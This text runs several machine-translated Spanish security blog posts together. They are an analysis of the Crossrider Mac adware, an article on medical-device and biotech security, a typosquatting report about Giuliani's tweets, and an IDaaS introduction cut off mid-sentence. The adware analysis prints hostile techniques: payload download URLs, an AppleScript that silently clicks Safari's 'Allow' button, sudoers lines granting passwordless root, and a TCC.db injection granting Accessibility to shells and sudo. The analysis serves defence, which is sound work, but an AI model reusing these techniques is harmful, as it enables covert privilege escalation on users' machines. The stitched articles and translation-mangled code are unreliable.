Como lo mostraron los datos revelados en nuestro informe sobre el estado del malware , las amenazas de Mac están en aumento, pero no son el mismo tipo de amenazas que experimentan los usuarios de Windows. En particular, las formas más tradicionales de malware, como ransomware, spyware y puertas traseras representan más del 27 por ciento de todas las amenazas de Windows. Esa cifra es inferior al 1 por ciento para Mac.

Además, el malware de Mac es bastante poco sofisticado en general. El 99 por ciento restante de las amenazas de Mac son programas publicitarios «simplemente» y programas potencialmente no deseados (PUP). Esto ha llevado a algunos en la comunidad de Mac a descartar estos hallazgos como sin importancia, incluso ha llevado a un blogger de Mac a escribir:

«Las Mac no tienen virus» es una afirmación que sigue siendo abrumadoramente cierta.

Sin embargo, el adware y los PUP pueden ser mucho más invasivos y peligrosos en la Mac que el malware «real». Pueden interceptar y descifrar todo el tráfico de red, crear usuarios ocultos con contraseñas estáticas, realizar cambios inseguros en la configuración del sistema y, en general, excavar sus raíces profundamente en el sistema, por lo que es increíblemente difícil erradicarlo por completo.

Para demostrar nuestro significado, lo que sigue es un análisis detallado de lo que puede ser la amenaza más sofisticada en macOS, llamada Crossrider, una amenaza que es «solo adware».

Instalación de adware para Mac

Malwarebytes detecta a Crossrider, también conocido como Bundlore o SurfBuyer, como Adware.Crossrider.

brands=(flashmall webshoppers webshoppy smartshoppy shoptool shoppytool coolshopper easyshopper liveshoppers smart-shoppy easy-shopper bestwebshoppers hotshoppy bestsmartshoppers myshopmate myshopbot surfmate surfbuyer couponizer shoppinizer shopperify mycouponize myshopcoupon mycouponsmart)

Como se llame, ha existido durante al menos seis o siete años, y ha evolucionado con bastante frecuencia durante ese tiempo.

El instalador de la primera etapa se encontró a partir del análisis de un desinstalador «weknow», que contenía un enlace a un script de shell. (El nombre «weknow» proviene de uno de los muchos sitios web utilizados por este adware). Este script de shell, que inicia todo el proceso de instalación, consta de alrededor de 300 líneas de código, un script bastante modesto que no tarda mucho en descargarse .

A pesar de su tamaño relativamente pequeño, el script abre un agujero de conejo profundo, descargando y ejecutando una gran cantidad de otros archivos. Dado que gran parte del código que se ejecuta se descarga, la carga útil exacta del adware se puede cambiar en cualquier momento y puede variar dependiendo de todo tipo de variables, como dónde se encuentra, si su máquina se ha visto antes , qué más está instalado, etc. Además, si alguno de los distintos servidores de entrega fuera pirateado por un actor más malicioso, esos scripts podrían usarse para desplegar más cargas maliciosas.

Luego, después de realizar una breve recopilación de datos de seguimiento y cargarlos en un servidor, Crossrider descarga un archivo de la siguiente URL:

http://cdn.mycouponsmartmac.com/download/Mac/InstallerResources/pwr.zip

Este archivo se expande en una aplicación llamada mm-install-macos.app. El único propósito de esta aplicación es phishing de la contraseña del usuario mediante la visualización de una solicitud de autenticación falsa. La contraseña se devuelve al script, en texto plano, donde se usa repetidamente para instalar el resto de los componentes.

Luego, el script determina la versión del sistema y realiza un conjunto de acciones en macOS 10.11 y superior, y otro en sistemas más antiguos.

Instalación a partir de 10.11

En los sistemas más nuevos, un webtools.apparchivo comprimido se descarga y ejecuta utilizando la contraseña phishing para ejecutarse como root:

http://cdn.myshopcouponmac.com/download/Mac/InstallerResources/wt.zip

Esta aplicación oscurece la pantalla, tiempo durante el cual instala una gran cantidad de archivos. Como parte de este proceso, también hace una copia de Safari que se modifica para habilitar automáticamente ciertas extensiones de Safari cuando se abre, sin necesidad de acciones del usuario.

Aunque estas modificaciones en Safari rompen su firma de código, que se puede usar para validar que una aplicación no ha sido modificada por otra persona que no sea su creador, macOS todavía la ejecutará felizmente debido a las limitaciones sobre cuándo estas firmas de código se verifican realmente.

Una vez que se completa este proceso, se elimina la copia de Safari, dejando la copia real de Safari pensando que tiene un par de extensiones de navegador adicionales instaladas y habilitadas.

Instalación en 10.10 y mayores

En sistemas más antiguos, Crossrider descarga el siguiente archivo:

http://dl.searchmine.net/download/Mac/InstallerResources/unified/SearchMine/imsearch.tar.gz

Esto se extrae y install.shse ejecuta un script que contiene. Este script solo tiene más de 900 líneas de código, y ejecuta varios otros scripts y procesos para realizar cambios en la configuración de Safari y Chrome e instalar extensiones del navegador.

En el caso de Safari, parte del proceso involucra un AppleScript que habilita una configuración de accesibilidad que proporciona acceso de teclado a todos los controles, y luego usa ese acceso para hacer clic en el botón «Permitir» en la ventana que muestra Safari cuando el usuario intenta instalar un Extensión Safari

dígale a la aplicación "Safari" que establezca los límites de las ventanas en {0, 0, -1000, -1000}
 decirle a la aplicación "Eventos del sistema"
     establecer visible del proceso "Safari" en falso
     indicar el proceso de solicitud "Safari"
         establecer de frente a verdadero
         log "Al hacer clic en el botón 1 de la hoja 1"
         dile a la ventana 1 que le diga a la hoja 1 que haga clic en el botón 1
         retraso 1
     final decir
 final decir

El script mueve furtivamente la ventana fuera de la pantalla, por lo que el usuario no ve que esto suceda durante el proceso de instalación. Todo lo que el usuario puede ver es que Safari se abre brevemente y luego se cierra.

A continuación, se descarga un binario nativo de Mac (como una aplicación, pero destinado a ejecutarse desde la línea de comandos en lugar de a través del Finder):

http://service.macinstallerinfo.com/Mac/getInstallScript/scripts/bin/iwt.bin

Entre otros archivos, este proceso, cuando se ejecuta, instalará un componente en la carpeta Aplicaciones y luego ejecutará un script de shell de casi 750 líneas para realizar más cambios en el navegador.

Datos de seguimiento

A lo largo del proceso de instalación, los diversos scripts y procesos informarán repetidamente los datos a una variedad de servidores de seguimiento. Estas transacciones envían datos potencialmente confidenciales, como:

• un identificador único para la computadora
• dirección IP
• el nombre de usuario
• versión de macOS
• Versión Safari
• Versión de Chrome
• una lista de todo lo que se encuentra en la carpeta Aplicaciones
• una lista de todos los agentes y demonios instalados
• una lista de todos los perfiles de configuración del sistema instalados
• la versión de Malware Removal Tool, un componente de seguridad de macOS diseñado para eliminar ciertas piezas conocidas de malware

Dado que gran parte de estos datos se obtienen a través de secuencias de comandos y procesos que se descargan de más de un servidor, los datos exactos que se recopilan y dónde se envían se pueden cambiar dinámicamente.

Cambios en el sistema.

Hay una serie de cambios realizados en todo el sistema, algunos de ellos peligrosos y difíciles de eliminar para la persona promedio. Esto convierte a Crossrider en una de las amenazas más invasivas que he visto en macOS.

Perfiles de configuración del sistema

Estos perfiles los usa normalmente un administrador de TI para administrar computadoras, a menudo de forma remota. Sin embargo, los perfiles también se pueden instalar manualmente, a través de un .mobileconfigarchivo, y el adware hace exactamente eso.

El perfil instalado bloquea la página de inicio y la configuración del motor de búsqueda en Safari y Chrome, evitando que el usuario los cambie hasta que se eliminen los perfiles.

Preferencias gestionadas

Una preferencia administrada es otro método para cambiar la configuración que administra un administrador de TI. En sistemas más antiguos, el adware instala archivos de preferencias administradas que establecen las preferencias de Chrome en páginas asociadas con el adware.

Cambios en el archivo sudoers

En sistemas basados ​​en Unix, como macOS, el usuario con el nivel más alto de permisos es el usuario raíz. En tales sistemas, el sudoersarchivo es un archivo que identifica qué usuarios pueden tener acceso de nivel raíz y cómo pueden obtenerlo.

El adware Crossrider realiza cambios en el sudoersarchivo en varios lugares. En uno, se agregan líneas para permitir que un par de procesos instalados tengan permisos de root cuando se ejecutan en la cuenta del usuario actual:

someuser ALL = NOPASSWD: SETENV: / Users / someuser / Applications / MyMacUpToDate / MyMacUpToDate
someuser ALL = NOPASSWD: SETENV: / Users / someuser / Applications / UpToDateMac / UpToDateMac

En algunos casos, el proceso de instalación golpea un inconveniente y no puede escribir estos cambios correctamente, lo que invalida el archivo sudoers, lo que interfiere con la capacidad de obtener permisos de root. Esto puede afectar la instalación del software y la capacidad de solucionar problemas, y es difícil de solucionar. (Para arreglar el sudoersarchivo, debe tener acceso de root, que no puede obtener porque el sudoersarchivo está roto, es un catch-22).

En otras partes del proceso de instalación, el adware proporciona a todos los procesos que se ejecutan para el usuario acceso ilimitado a la raíz sin contraseña. Las secuencias de comandos intentan revertir estos cambios, pero es posible que no siempre tengan éxito (como si la secuencia de comandos o el proceso se bloquean).

someuser ALL = (ALL) NOPASSWD: ALL

Estos cambios podrían ser secuestrados por otro software malicioso. Por ejemplo, si una pieza de malware sobrescribiera los procesos MyMacUpToDate o UpToDateMac en el primer ejemplo (que no requeriría acceso especial), podría escalar a la raíz para hacer más daño. En el último ejemplo, cualquier proceso podría elevarse al acceso raíz incondicionalmente.

TCC.db

En varios lugares, el proceso de instalación intentará modificar la base de datos TCC.db. Esta base de datos identifica qué permisos ha otorgado el usuario a diferentes procesos, como si una aplicación puede acceder a su calendario, sus contactos, el micrófono de su computadora, su cámara web o ciertas carpetas en su sistema.

Este adware intenta proporcionar a sí mismo y a una amplia franja de otros procesos una de las capacidades más poderosas: acceso de accesibilidad. Este permiso permite que estos procesos controlen otros procesos, que pueden usarse para capturar datos confidenciales, entre otras cosas.

if [[ "${osxVer}" == *"10.11"* ]] || [[ "${osxVer}" == *"10.12"* ]]; then     /usr/bin/sqlite3 <<EOF .open '$ {TCCDB}' inserte o reemplace en los valores de acceso ('kTCCServiceAccessibility', 'com.apple.Terminal', 0,1,1, NULL, NULL); ... inserte o reemplace en los valores de acceso ('kTCCServiceAccessibility', '/ bin / bash', 1,1,1, NULL, NULL); insertar o reemplazar en valores de acceso ('kTCCServiceAccessibility', '/ bin / sh', 1,1,1, NULL, NULL); inserte o reemplace en los valores de acceso ('kTCCServiceAccessibility', '/ usr / bin / sudo', 1,1,1, NULL, NULL); inserte o reemplace en los valores de acceso ('kTCCServiceAccessibility', '$ {TMPDIR} /. tmpma / installOffers.sh', 1,1,1, NULL, NULL); insertar o reemplazar en los valores de acceso ('kTCCServiceAccessibility', 'com.stubberify.mym', 0,1,1, NULL, NULL); inserte o reemplace en los valores de acceso ('kTCCServiceAccessibility', 'com.tostubornot.mym', 0,1,1, NULL, NULL); insertar o reemplazar en valores de acceso ('kTCCServiceAccessibility', 'com.trustedmac.service', 0,1,1, NULL, NULL); insertar o reemplazar en los valores de acceso ('kTCCServiceAccessibility', 'com.autobots.transform', 0,1,1, NULL, NULL); inserte o reemplace en los valores de acceso ('kTCCServiceAccessibility', 'com.mm-install-macos.www', 0,1,1, NULL, NULL); inserte o reemplace en los valores de acceso ('kTCCServiceAccessibility', 'com.mm-installer-macos.www', 0,1,1, NULL, NULL); .dejar EOF fi

Esto solo funciona en sistemas más antiguos, ya que el archivo TCC.db es de solo lectura por cualquier otro que no sea el sistema en versiones recientes de macOS. Sin embargo, en un sistema más antiguo, esto puede otorgar permisos poderosos que podrían ser abusados ​​por futuras actualizaciones del adware o por el malware que intenta escalar su acceso a los datos del usuario.

Extensiones de navegador

Se instalan varias extensiones de navegador para Safari o Chrome o ambas, dependiendo de la versión del sistema y las versiones de Safari y Chrome. Estas extensiones le dan al adware una mayor capacidad para controlar el comportamiento del navegador.

Normalmente, la adición de una extensión del navegador requiere que el usuario confirme, con el propósito expreso de evitar que el adware o el malware instalen subrepticiamente una extensión del navegador. Sin embargo, este adware utiliza una serie de trucos sospechosos, como la copia modificada de Safari mencionada anteriormente, para instalar estas extensiones sin que el usuario tenga que aprobarlas o incluso saber que se han instalado.

Las extensiones del navegador pueden recopilar un nivel intrusivo de información del navegador: esencialmente, cualquier información que pueda mostrarse en un sitio web o ingresarse en un formulario en un sitio web. Este último puede incluir datos confidenciales, como nombres de usuario, contraseñas y números de tarjetas de crédito.

Agentes de lanzamiento y demonios

Los agentes de lanzamiento y los daemons proporcionan una de las formas más comunes para que los procesos se ejecuten de manera persistente en macOS. El adware Crossrider instala múltiples agentes o demonios, dependiendo de qué archivos se estén instalando. Afortunadamente, estos son extremadamente fáciles de detectar para alguien conocedor, de hecho, son una de las primeras cosas que una tecnología podría buscar, y son relativamente fáciles de eliminar.

El malware debe ser peor, ¿verdad?

Afortunadamente (o desafortunadamente, dependiendo de cómo lo veas), no. Contraste el adware Crossrider con algunos programas maliciosos de estados nacionales, como el malware creado por el grupo Lazarus de Corea del Norte o el malware OceanLotus que se cree que fue creado por Vietnam. Tal malware normalmente instala un solo agente de lanzamiento o demonio, fácilmente detectado por cualquier experto que mire la máquina. El proceso de instalación de Crossrider solo supera con creces estas formas de malware en sofisticación.

El malware de Mac no suele ser particularmente sofisticado. Por supuesto, esto no significa que no pueda ser peligroso, pero en este momento, está sentado en la mesa de malware para niños. En pocas palabras: no es sofisticado porque no tiene que serlo. Si eres un usuario de Mac infectado con malware, probablemente no habrá ningún síntoma externo que puedas notar.

Por el contrario, el adware es muy notable, ya que cambia el comportamiento de su computadora, generalmente su navegador web. Por esta razón, el adware Mac ha tenido que evolucionar mucho más allá del malware Mac, y se ha vuelto mucho más astuto y más difícil de eliminar.

¿Cuál es la comida para llevar?

Aunque a muchos expertos de Mac les gusta descartar el adware como un problema, dicen que las personas solo se infectan cuando hacen «cosas estúpidas», la mayoría de las violaciones de datos más masivas y los ataques dañinos de ransomware en máquinas Windows ocurren por negligencia del usuario: dejando los datos expuestos en Internet, abriendo enlaces maliciosos a través de correo electrónico de phishing o no parcheando el software de manera oportuna.

El adware es un problema creciente en Mac, y también en los sistemas operativos Windows y Android. Fue la amenaza más frecuente en todas las regiones del mundo, tanto para los consumidores como para las empresas. Y vimos que algunos adware de Mac eran en realidad más frecuentes que la mayoría de las amenazas de Windows en 2019.

Peor aún, estas infecciones de adware suelen ser más graves que una infección de malware, lo que abre posibles agujeros de seguridad que podrían aprovecharse con más amenazas maliciosas y resulta difícil deshacerse de ellos. Además, el adware en la Mac también intercepta y descifra todo el tráfico de la red, usa nombres generados aleatoriamente para los archivos instalados, usa técnicas de análisis para evitar que los investigadores los analicen, crea usuarios ocultos en el sistema con contraseñas conocidas y más.

En general, si tuviera que elegir entre uno u otro, estaría dispuesto a infectar mi propia máquina con la mayoría del malware de Mac antes de hacer lo mismo con el adware de Mac. El malware para Mac a menudo me hace reír. El adware de Mac a veces me da escalofríos.

COI

Los siguientes indicadores de compromiso están asociados con este adware.

Dominios

http://www.weknow.ac
http: //*.searchmine.net
http://client.mm-bq.host
http://service.macinstallerinfo.com
http: //*.macmymacupdater.com
http: //*.mycouponsmartmac.com
http: //*.myshopcouponmac.com
http: //*.mycouponizemac.com
http: //*.shopperifymac.com
http: //*.shoppinizermac.com
http: //*.couponizermac.com
http: //*.surfbuyermac.com
http: //*.surfmatemac.com
http: //*.myshopbotmac.com
http: //*.myshopmatemac.com
http: //*.bestsmartshoppersmac.com

Archivos

searchmine.sh	441fa62645591b2aa1b853ebfa51fe5bb36e6464ad3a4ff58a0b8297bea851d9
mm-install-macos	ee94315a1099a982a2b61878a64ee6fe9134e544cdcae565995948a8ca843e51
webtools	888a1f9dfadde892496a3214ceb2a5a62a3997381ba6dbcd4e741d033352fd31
imsearch.tar.gz	e07c9e59f7621eead7300cfe264a2d24a7749d592d8a2b32c48125eadf293f08
install.sh	591919f7b5ced77431990e7e9f257ce049f1fb2f93e9cdcb19b5400060518031
iwt.bin	168d9c1a06ab3f633e6fc724834ad8a9f4dc3c71945a34342347ce0df042a361
gui_scripting.sh	df402cf21e5f78e55050d7ee14c050869d477faaeb58ab841f5992a0638a4a9f
installSafariExtension	212a954a7b67e851063daa2acabe841e8e54a4c29ca4f1fc096a160f1764aa14
installSafariHpNt	18b449b7d25733557d305b8a8ae9b331e628ec892996a83a39cb74bf2a7eca9a
update_legacy_chrome.py	b5ac18d3ea66dfad4baf02efad1a2f27f8134a2cd0f3c1d78e44d49bed613064
updatePreferences.py	6180666302bbf8032801d0aec6df08fbd27349c9d628f3a3dd7295256bf751b6

¡Gracias a Aditya Raj Das por encontrar la muestra y ayudar con el análisis!

El nivel y la velocidad de las innovaciones que tienen lugar en la industria biotecnológica son desconcertantes. Por un lado, nos hace esperar que podamos reducir rápidamente la cantidad de enfermedades y sus consecuencias a través del avance tecnológico, salvando miles de vidas. Por otro lado, las preocupaciones sobre la aplicación de la tecnología conectada a Internet nos hacen preguntarnos: ¿a qué costo?

¿A dónde nos lleva la mezcla de tecnología y medicina? Los avances en la terapia genética han remodelado el tratamiento del cáncer tal como lo conocemos. Sin embargo, otras aplicaciones, como la automatización de la ingesta de medicamentos mediante la medición de datos biométricos, pueden introducir otros problemas que el mundo médico y de seguridad no ha resuelto.

Sabiendo que cada cuerpo humano es único y puede reaccionar de otra manera al mismo procedimiento, parece prudente trazar la línea en una cierta cantidad de automatización. Pero, ¿cómo determinamos dónde dibujar la línea? ¿Es inteligente dejar esa decisión a los grandes farmacéuticos? Echemos un vistazo a los desarrollos en biotecnología que requieren una visión más amplia desde las perspectivas de seguridad y privacidad.

Desarrollos en la industria del cuidado de la salud.

Algunos de los desarrollos más prometedores para el cuidado de la salud en las últimas etapas de refinación o incluso en uso son técnicas en las que los sensores están unidos o insertados en el cuerpo del paciente. Los sensores están diseñados para transmitir datos sobre ciertas condiciones corporales al personal de atención médica.

Una de esas tecnologías se inserta directamente en la medicación de los pacientes mediante un chip. Estas «píldoras inteligentes» envían datos biométricos desde el torrente sanguíneo. Cuando el paciente ingiere la píldora, el chip será detectado por un parche en su estómago en el momento en que se digiere. Si el parche no recibe la señal adecuada, alerta al médico del paciente.

Un gran paso adelante para el futuro de las píldoras inteligentes será la automatización y la administración oportuna de medicamentos; algo actualmente en desarrollo. Estas píldoras inteligentes están diseñadas para facilitar la vida de los pacientes al incorporar un sistema de seguimiento en la píldora que desencadena la liberación del medicamento de manera oportuna, por lo que no se puede olvidar.

Las píldoras inteligentes también podrían programarse para liberar el medicamento cuando se cumplan ciertas circunstancias. Ya existe un sistema similar a este para la diabetes. Se utilizan bombas de insulina para diabéticos tipo 1 que liberan insulina cuando se detecta un nivel bajo de azúcar en la sangre, básicamente imitando la forma en que se comportaría el páncreas para las personas sanas.

Biotecnología diagnóstica

Los biodetectores existentes son dispositivos de medición internos que transmiten métricas corporales como presión arterial, pulso, saturación de oxígeno, azúcar en la sangre, etc. Estos biodetectores y sensores que miden la presencia de otras sustancias en la sangre se pueden usar para ajustar la administración de medicamentos. . Pero, ¿qué pasa si alguien más puede recibir estas transmisiones?

La viabilidad de los biosensores multiplex para el diagnóstico de infección del torrente sanguíneo se ha investigado durante algunos años y es otro desarrollo que podría conducir a transmisiones relacionadas con nuestra salud desde el interior de nuestro cuerpo a un dispositivo «inteligente».

Las compañías farmacéuticas ya han lanzado píldoras inteligentes digitales que contienen chips de computadora. La primera píldora digital contra el cáncer, que se lanzó a principios de 2019, contiene un chip y cápsulas llenas de capecitabina, una quimioterapia contra el cáncer que los pacientes deben tomar varias veces al día.

Otras innovaciones biotecnológicas

El genoma humano se ha mapeado casi por completo y estamos ajustando rápidamente la capacidad de leer el mapa. Pero, ¿qué augura esta perspectiva para el futuro de la información que se puede extraer de las muestras de ADN que proporcionamos por diferentes razones? ¿Donar sangre o participar en una prueba de ADN ahora resultará en una pesadilla de privacidad más adelante? El riesgo que tomamos ahora crecerá en nosotros a medida que la ciencia descubra más sobre la información almacenada en nuestro ADN.

Con una mayor comprensión de nuestra genética viene una mayor capacidad para su manipulación. Y la edición de genes actualmente se erige como una de las áreas más emocionantes y preocupantes dentro de la industria biotecnológica.

Otro avance preocupante es el uso de inteligencia artificial (IA) para acelerar y abaratar el desarrollo de nuevos medicamentos. La IA en particular puede usarse para reducir la cantidad de prueba y error necesarios para diseñar un candidato a medicamento una vez que se identificó un objetivo prometedor de la enfermedad. También se puede usar para investigar y encontrar casos de uso inesperado de medicamentos que fracasan en ensayos clínicos. Cambios prometedores, seguro. Pero, ¿qué podría pasar por alto la IA que la mente humana captaría? ¿Y cuánto entraría en juego la moralidad si las máquinas realizaran todas las pruebas?

Control remoto de extremidades artificiales y animales.

El avance de las prótesis modernas ha ido de la mano con el aumento en los rápidos desarrollos en el sector de la salud biotecnológica.

En una combinación de robótica y neuroingeniería, los científicos están trabajando en una nueva mano robótica que podría ser un dispositivo que cambie la vida de los amputados. El objetivo es leer y transmitir el movimiento intencional de los dedos leído de la actividad muscular en el muñón del amputado para el control individual de los dedos de la mano protésica.

En el campo militar, los tiburones y otros animales recibieron implantes cerebrales que los hacen controlables de forma remota. Estos tiburones podrían usarse, por ejemplo, para encontrar submarinos enemigos.

Protocolos de comunicación en biotecnología

La píldora inteligente, producida y patentada por Proteus y llamada Abilify MyCite, envía un pulso simple de la píldora al parche tan pronto como la píldora es absorbida por el ácido del estómago. No hay problema allí, pero luego el parche envía datos como el momento en que se tomó la píldora y la dosis a una aplicación de teléfono inteligente a través de Bluetooth . Los datos se almacenan en la nube donde el médico del paciente y hasta otras cuatro personas elegidas por el paciente pueden acceder a la información. El paciente puede revocar su acceso en cualquier momento.

En 2017, la FDA declaró que planeaba contratar a más personal con «comprensión profunda» del desarrollo de software en relación con los dispositivos médicos, y comprometerse con los empresarios en nuevas pautas, porque esperaba obtener más solicitudes de aprobación para las píldoras digitales. Esto fue después de la aprobación de Abilify MyCite, que es un síntoma típico de la legislación que persigue innovaciones técnicas sin ponerse al día realmente.

En 2018, los piratas informáticos demostraron que podían instalar malware en un marcapasos implantado después de haber descubierto errores en la red de distribución de software de Medtronic , una plataforma que no se comunica directamente con los marcapasos, sino que más bien trae actualizaciones para equipos de soporte como monitores domésticos y programadores de marcapasos, que Los profesionales de la salud utilizan para sintonizar marcapasos implantados.

Bluetooth y dispositivos médicos

Bluetooth es ideal para la conexión inalámbrica continua de corto alcance, que utilizamos para transmitir audio y datos. Los protocolos Bluetooth más utilizados en equipos médicos son Bluetooth Low Energy (BLE) y Bluetooth Classic

BLE es un protocolo Bluetooth que se lanzó en 2010, fue diseñado para lograr los objetivos de bajo consumo de energía y latencia, al tiempo que se adapta a la gama de dispositivos interoperable más amplia posible. La desventaja es que puede comportarse de manera diferente dependiendo de las plataformas de teléfonos inteligentes. Esto se debe a que el dispositivo anuncia en un horario para la respuesta del teléfono inteligente. Cuando el teléfono inteligente responde, se realiza un apretón de manos (enlace), lo que facilita una transferencia confirmada del paquete de datos al teléfono inteligente antes de cerrar la conexión. Esto ahorra energía, pero también es responsable de la velocidad de transferencia de datos impredecible.

BLE tampoco requiere el emparejamiento entre el remitente y el receptor y puede enviar datos autentificados sin cifrar. Entendemos los beneficios de ahorrar energía:

• Los dispositivos pueden permanecer más tiempo en el cuerpo sin tener que reemplazarlos
• Las baterías pueden ser más pequeñas, por lo que son más fáciles de insertar y menos molestas

Pero dependiendo de la naturaleza y particularmente la sensibilidad de los datos transmitidos, otras consideraciones podrían entrar en juego. Desafortunadamente, los dispositivos BLE también se han visto afectados por las vulnerabilidades de SweynTooth .

Recomendaciones

Los desarrolladores de dispositivos médicos que pretenden usar Bluetooth como tecnología para conectar dispositivos entre sí y con Wi-Fi deben considerar cuidadosamente qué protocolo Bluetooth es el adecuado para su sistema. Para hacer esto, es importante tener una comprensión clara de las necesidades del sistema y las opciones disponibles.

Los dispositivos médicos deben poder actualizarse fácilmente para aquellas circunstancias en las que se encuentran nuevas vulnerabilidades y se deben aplicar parches u otras actualizaciones importantes.

Tal vez la industria de la salud incluso debería considerar diseñar un nuevo protocolo similar a Bluetooth. La combinación de las propiedades de baja energía con algunas medidas de seguridad adicionales podría ser rentable a largo plazo.

Las soluciones en la nube que se utilizan para almacenar datos personales y médicos sensibles merecen ser mantenidas en contra de un alto estándar de seguridad.

Recomendamos solo entregar sus muestras de ADN a organizaciones confiables y solo por razones de suma importancia como su salud.

Las máquinas no están exentas de fallas ni son tan inteligentes como podríamos pensar. La confianza ciega en las máquinas cuando se trata de atención médica puede terminar en una catástrofe . Hay un área donde la atención personal hace mucho más bien que la aplicación totalmente automatizada de la medicina.

Rudy Giuliani, ex zar de la seguridad cibernética, ha sido blanco de errores tipográficos en Twitter, gracias a los errores ortográficos y otros errores de teclado cometidos en varios de sus tweets públicos. En un tweet enviado el domingo, Giuliani tenía la intención de enviar a sus más de 650,000 seguidores a su nuevo sitio web, RudyGiulianics.com. En cambio, un espacio agregado después de «Rudy» envió a los usuarios en una búsqueda de redirección que finalmente aterrizó en una página web con adware .

Typosquatting se ha utilizado durante mucho tiempo como una forma de capitalizar los errores cometidos por aquellos con dedos torpes. Una URL mal escrita, que normalmente llevaría a los usuarios a una página de error 404, en su lugar se redirige a un sitio completamente no relacionado, a menudo uno diseñado para malas intenciones. Por ejemplo, supongamos que ingresas yotube.com en la barra de direcciones de tu navegador en lugar de youtube.com. En lugar de ver el portal normal de YouTube, será redirigido a través de algunas redes publicitarias y probablemente terminará en una página de estafa, gracias al práctico trabajo de los typosquatters emprendedores.

Typosquatting puede ser un negocio rentable, ya que los actores de amenazas registrarán dominios léxicamente cercanos a grandes marcas o sitios web populares para obtener un gran tráfico. El objetivo final no siempre es monetizar a través de redireccionamientos malvertidos , podría ser phishing, robo de datos o incluso hacktivismo.

En el caso de Giuliani, una figura política pública ha sido identificada por los ciberdelincuentes por su tendencia a los tweets cargados de errores tipográficos. De hecho, la cuenta de Twitter de Giuliani contiene numerosos tweets con errores ortográficos en su sitio web personal que a veces conducen a intentos de trolling o redirigen a esquemas de publicidad maliciosa. Examinamos algunos de estos casos.

El error tipográfico lleva al trolling político

Aquí hay un tweet enviado desde la cuenta de Giuliani usando un iPad. Quien compuso ese tweet olvidó agregar un espacio entre la palabra «Watch» y «rudygiulianics.com».

Como resultado, el sitio web se convierte en Watchrudygiulianics.com, que se registró un día después del tweet:

Nombre de dominio: watchrudygiulianics.com
Registrador: GoDaddy.com, LLC
Fecha de creación: 2020-02-16T05: 23: 50Z

Visitar el sitio inmediatamente redirige a los usuarios a https://www.drugrehab.com/treatment/, un sitio de ayuda con el abuso de sustancias.

En otro ejemplo , vemos un error tipográfico mucho más sutil para el sitio web de Giuliani, donde falta una ‘i’ en RUDYGIULIANCS.com (el sitio correcto es rudygiulianics.com).

El dominio rudygiuliancs.com también se registró recientemente (pero antes de que se publicara el tweet, por lo tanto, era un registro preventivo para un próximo error tipográfico o tal vez ya se había hecho el error).

Nombre de dominio: rudygiuliancs.com
Registrador: Wild West Domains, LLC
Fecha de creación: 2020-02-07T16: 30: 38Z

Esta vez, visitar este enlace redirige a los visitantes a una página de Wikipedia para el escándalo Trump-Ucrania:

Malvertising y otros esquemas de tráfico

Como se mencionó anteriormente, los typosquatters generalmente verán los nombres de dominio populares y registrarán nombres nuevos que probablemente serán el resultado de un error tipográfico. Debido a que Giuliani tiene más de 650,000 seguidores en Twitter y es una figura política muy conocida regularmente en los titulares, los estafadores saben que es una buena fuente de tráfico potencial en la web simplemente por el error tipográfico.

En el ejemplo del domingo, un error tipográfico condujo a un esquema de publicidad maliciosa. Esta vez , se insertó un espacio entre «Rudy» y «Giulianics.com».

Este error tipográfico dio como resultado un enlace a Giulianics.com, un dominio registrado a fines de enero.

Nombre de dominio: giulianics.com
Registrador: GoDaddy.com, LLC
Fecha de creación: 2020-01-31T20: 29: 50Z

Como se ve en la imagen de arriba, una serie de redireccionamientos sucederán una vez que visite ese dominio. Esto es típico para las cadenas de publicidad maliciosa que registran su navegador y otras configuraciones para entregar la carga útil adecuada.

En este caso, al visitar Estados Unidos a través de Google Chrome, recibimos una extensión de navegador llamada Navegación privada:

Aunque no examinamos la extensión en detalle, varios comentarios de Google Play Store dicen que la extensión fue forzada mientras navegaba por la web.

Entre otras capacidades, puede leer el historial de su navegador, los datos que ingresa en los sitios y puede cambiar su motor de búsqueda predeterminado. Como regla general, generalmente se recomienda abstenerse de instalar demasiadas extensiones de navegador, especialmente cuando se promueven a través de redireccionamientos no deseados.

A fines de enero, hubo un informe de que al visitar el sitio web de Giuliani se distribuía malware. No pudimos confirmarlo en ese momento, pero a la luz de la situación actual del error tipográfico, creemos que es más probable que uno de los tweets que contengan el enlace incorrecto conduzca a una cadena de publicidad maliciosa y posiblemente a un bloqueador de navegador.

Monitoreo de cuentas populares por errores

Muchos ataques que vemos en la naturaleza son oportunistas, orando por las últimas noticias o eventos que puedan llamar la atención. También siempre ha habido un gran interés en las cuentas de redes sociales populares, pero generalmente hackeándolas directamente. En este caso, los actores oportunistas están esperando que ocurra el próximo error tipográfico para enviar su propio mensaje o monetizarlo a través de redireccionamientos maliciosos.

Esto sirve como un recordatorio de que incluso las cuentas de redes sociales conocidas o verificadas pueden enviar a los usuarios en direcciones no deseadas que conducen a estafas o malware. En cierto sentido, se puede abusar de cualquier tipo de comunicación para beneficio propio del atacante al reconocer un patrón de errores predecibles e inmediatamente actuar sobre ellos.

Para aquellos que desean protección contra tales redirecciones y otras actividades maliciosas del sitio web, Malwarebytes ofrece una extensión de navegador gratuita que adopta una postura agresiva para bloquear la publicidad maliciosa y otros esquemas dudosos.

A veces, los consumidores lo tienen fácil.

Tomemos, por ejemplo, cuando se bloquean accidentalmente de su correo electrónico personal. Su solución? Restablecer la contraseña Con un clic, pueden cambiar su contraseña antigua y complicada con una nueva y más memorable.

El restablecimiento de contraseña de autoservicio es increíble como este. Para los usuarios en una red empresarial, no es tan simple. Es decir, a menos que estén utilizando identidad como servicio (IDaaS).

¿Qué es IDaaS?

IDaaS, que se pronuncia » ay-das», significa identidad como servicio. Esencialmente, se trata de la gestión de identidad y acceso (IAM), pronunciada » I-am», implementada desde la nube.

Las organizaciones usan la tecnología IAM para asegurarse de que sus empleados, clientes, contratistas y socios sean quienes dicen ser. Una vez confirmado mediante ciertos métodos de autenticación, el sistema IDaaS proporciona derechos de acceso a recursos y sistemas en función de los permisos otorgados. Y debido a que se implementa a través de la nube, las entidades comerciales pueden solicitar acceso de forma segura donde sea que estén y cualquier dispositivo que estén utilizando.

Dar a sus propios usuarios acceso de autoservicio a los portales es solo una de las formas en que un sistema IDaaS puede brindar soporte a las empresas. De hecho, la necesidad de interactuar mejor con los clientes al tiempo que protege sus datos y se ajusta a los estándares establecidos se ha convertido en la principal fuerza impulsora detrás del cambio a IDaaS.

IDaa S vs. IAM tradicional

Si bien los sistemas tradicionales de administración de identidad en las instalaciones ofrecen niveles de acceso de autoservicio para los empleados de la oficina, sus beneficios son limitados en comparación con las opciones basadas en la nube. Esto se debe a que los IAM son:

